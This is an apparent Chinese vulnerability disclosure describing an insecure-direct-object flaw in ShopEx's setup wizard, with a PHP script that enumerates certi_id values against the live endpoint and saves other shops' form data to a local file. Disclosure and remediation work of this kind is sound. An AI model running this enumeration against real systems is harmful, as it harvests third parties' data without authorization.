简要描述:
ShopEx 某接口缺陷，可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面。
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站。
<?php
// Drives the reproduction: calls ShowshopExD() once per certi_id in 1..9999.
// ShowshopExD() is declared further down in this file; PHP hoists unconditional
// top-level function declarations, so the call resolves.
// Each iteration is one HTTP GET to the wizard page, so a run of sequential
// certi_id values from a single client is the server-side signature of this
// enumeration.
for ($i=1; $i < 10000; $i++) { // enumerate
    ShowshopExD($i);
}
/**
 * Reproduction from the report: requests the ShopEx shop-setup wizard page for
 * a single certi_id and prints/records the text <input> fields it returns.
 *
 * The defect it exercises is server-side: the wizard identifies the shop only
 * by the client-supplied `refer` query parameter (base64 of a JSON object that
 * carries certi_id), so any caller can obtain another shop's pre-filled form
 * data by changing that integer. Base64 is an encoding, not authentication;
 * the remediation belongs on the server — bind certi_id to an authenticated
 * session or a server-signed token and reject ids the caller is not
 * authorized for — rather than in a different encoding of `refer`.
 *
 * @param int|string $cid  candidate certi_id; normalised with intval() below
 * @return void  side effects: one HTTP GET, output via echo, append to c:/shopEx.txt
 */
function ShowshopExD($cid) {
    $url='http://guide.ecos.shopex.cn/step2.php';
    // Same JSON shape the report decoded from a real `refer`; callback_url is
    // a placeholder host here.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url.'?refer='.$refer;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; // return the body as a string instead of printing it
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ; // has no effect since PHP 5.1.3; kept as written
    // curl_exec() returns false on failure; that is coerced to "" below and the
    // strpos() check simply fails — transport errors are never reported.
    $result = curl_exec($ch);
    // Re-encodes the UTF-8 page to GB2312 — presumably for a GB2312 console and
    // the text file on the Windows path below. $refer is pure ASCII, so the
    // strpos() check is unaffected by the conversion.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // The script treats the refer string appearing in the response as the
    // "valid certi_id" signal (presumably the wizard echoes it into the form;
    // not verifiable here). strpos() returns 0 for a match at offset 0, which
    // is falsy, so a match at the very start of the page would be missed.
    // NOTE(review): the copied source is garbled by forum anti-copy noise; this
    // reconstruction assumes no stray ';' followed the if(), which would have
    // made the block below run unconditionally — confirm against the original.
    if(strpos($result,$refer))
    {
        $fp = fopen("c:/shopEx.txt",'ab'); // save to file (append, binary); return value is not checked
        // Every <input type="text" .../> tag; group 1 is its attribute text.
        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
        foreach ($value[1] as $key) {
            // Pull name="..." and value="..." out of the attribute text.
            // $res[1][0] / $res[3][0] are undefined (PHP notice/warning, empty
            // output) when an input lacks either attribute.
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
            echo $res[1][0].':'.$res[3][0]."\r\n";
            $col =$res[1][0].':'.$res[3][0]."\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式。但仅更换 refer 的编码或加密方式并不能解决问题：certi_id 由客户端提交，服务端必须将其与已认证的会话或服务端签名的凭据绑定并校验授权，否则换任何编码仍然可以被遍历。